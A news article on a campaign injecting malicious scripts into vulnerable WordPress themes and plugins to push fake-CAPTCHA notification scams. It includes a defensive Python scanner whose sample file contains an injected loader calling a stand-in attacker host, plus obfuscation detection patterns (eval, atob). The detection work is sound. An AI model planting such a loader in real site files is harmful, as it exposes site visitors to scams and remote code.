Tue, 21-Oct-2025


WordPress Tools are being used by hackers to spread scams


If you have recently visited a website and found yourself redirected to pages pushing questionable “resources” or intrusive adverts, it is likely that the site was 1) built with WordPress themes and plugins and 2) hacked.

On Wednesday, researchers at Sucuri, a GoDaddy-owned security firm, reported that the hackers behind a months-long campaign to inject malicious scripts into WordPress themes and plugins with known security flaws were at it again.

These vulnerabilities affect themes and plugins created by hundreds of third-party developers using the open source WordPress software, not WordPress.com, which provides hosting and website-building tools. WordPress.com’s parent company, Automattic, is a major contributor to the software but does not control it.

According to Sucuri, the new wave of the campaign has infected 322 WordPress sites through vulnerable plugins and themes, while the “real number of vulnerable websites is likely significantly greater.”

According to Sucuri malware expert Krasimir Konov, hackers employed this approach to infect roughly 6,000 sites in April alone.
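The injections described above land in theme and plugin files, so a site owner’s first check is whether any of those files now load scripts from a host that is not their own. The scanner below is an added example for this article, not Sucuri’s tooling or anything shipped by WordPress.org. It assumes a hypothetical site hostname (“example-site.test”), a short list of hosts a theme may legitimately reference, and constructed sample files (one clean `header.php`, one with an injected loader) so that it runs stand-alone; in practice you would point it at `wp-content/themes` and `wp-content/plugins`.

```python
"""
Flag injected remote <script> tags in WordPress theme and plugin files.

Added example for this article, not Sucuri's scanner or a WordPress.org tool.
Assumptions: the site's own hostname is known (hypothetical "example-site.test"),
and theme/plugin PHP or JS files should not load scripts from unrelated hosts;
anything else is reported for manual review.
"""
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# <script ... src="..."> with double, single or no quotes around the URL
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\ssrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)

# Constructs that are common in injected inline loaders (review, not proof, of malice)
OBFUSCATION_RE = re.compile(
    r"\beval\s*\(|\batob\s*\(|String\.fromCharCode|\bunescape\s*\(", re.IGNORECASE
)

# Hosts a theme may legitimately reference (assumption; adjust per site)
ALLOWED_HOSTS = {"fonts.googleapis.com", "fonts.gstatic.com"}


def external_script_hosts(source: str, site_host: str) -> list[str]:
    """Hosts of <script src=...> tags that are neither the site itself nor allowed.

    Protocol-relative URLs (//host/x.js) are normalised to https; relative
    paths (no host part) are ignored because they stay on the site.
    """
    found = []
    for src in SCRIPT_SRC_RE.findall(source):
        if src.startswith("//"):
            src = "https:" + src
        host = urlparse(src).netloc.lower()
        if host and host != site_host.lower() and host not in ALLOWED_HOSTS:
            found.append(host)
    return found


def scan_source(source: str, site_host: str) -> dict:
    """Findings for the contents of one file."""
    return {
        "external_hosts": external_script_hosts(source, site_host),
        "obfuscated": OBFUSCATION_RE.search(source) is not None,
    }


def scan_tree(root: Path, site_host: str) -> list[tuple[str, dict]]:
    """Scan every .php and .js file under root (e.g. wp-content/themes)."""
    results = []
    for path in sorted(root.rglob("*")):
        if path.suffix.lower() not in {".php", ".js"}:
            continue
        findings = scan_source(path.read_text(errors="replace"), site_host)
        if findings["external_hosts"] or findings["obfuscated"]:
            results.append((str(path.relative_to(root)), findings))
    return results


# Constructed samples: a clean header.php and one carrying an injected loader
CLEAN_HEADER = """<?php wp_head(); ?>
<script src="/wp-content/themes/demo/js/menu.js"></script>
<link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet">
"""
INJECTED_HEADER = """<?php wp_head(); ?>
<script src=//cdn.attacker-example.test/loader.js></script>
<script>eval(atob("Li4u"));</script>
"""


def demo() -> list[tuple[str, dict]]:
    """Write the constructed samples to a temp directory and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "clean").mkdir()
        (root / "clean" / "header.php").write_text(CLEAN_HEADER)
        (root / "hacked").mkdir()
        (root / "hacked" / "header.php").write_text(INJECTED_HEADER)
        return scan_tree(root, "example-site.test")


if __name__ == "__main__":
    for rel_path, findings in demo():
        print(rel_path, findings)
```

A hit is a file to diff against a fresh copy of the theme or plugin, not a verdict on its own; and because the campaign targets plugins with known flaws, a flagged plugin that has no patched release (closed or never hosted on WordPress.org, as the WordPress.com statement below notes) has to be removed or replaced rather than updated.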

Konov wrote, “This page tricks unsuspecting users into subscribing to push notifications from the malicious site. If they click on the fake CAPTCHA, they’ll be opted in to receive unwanted ads even when the site isn’t open — and ads will look like they come from the operating system, not from a browser.”

If that weren’t bad enough, Konov says push-notification opt-in tricks are one of the most common ways hackers run tech support scams. These are the windows that pop up out of nowhere, tell you your computer is infected and instruct you to call a phone number to get it fixed. Do not call. Because the notifications arrive through a subscription the browser itself granted, they persist until that site’s notification permission is revoked in the browser’s site settings.

The Federal Trade Commission, which is an expert in spotting scams, advises that genuine security notifications and cautions will not require you to call a phone number for technical assistance.

A spokesperson for WordPress.com said, “If security issues are identified, plugin and theme authors are notified immediately. Specific to Sucuri’s report, any plugin that wasn’t patched was either closed or not hosted on WordPress.org. WordPress.org also provides resources on security to both theme developers and plugin developers.”

The spokesperson added, “For self-hosted sites, WordPress users are notified and encouraged to update core software, plugins and themes by default.”
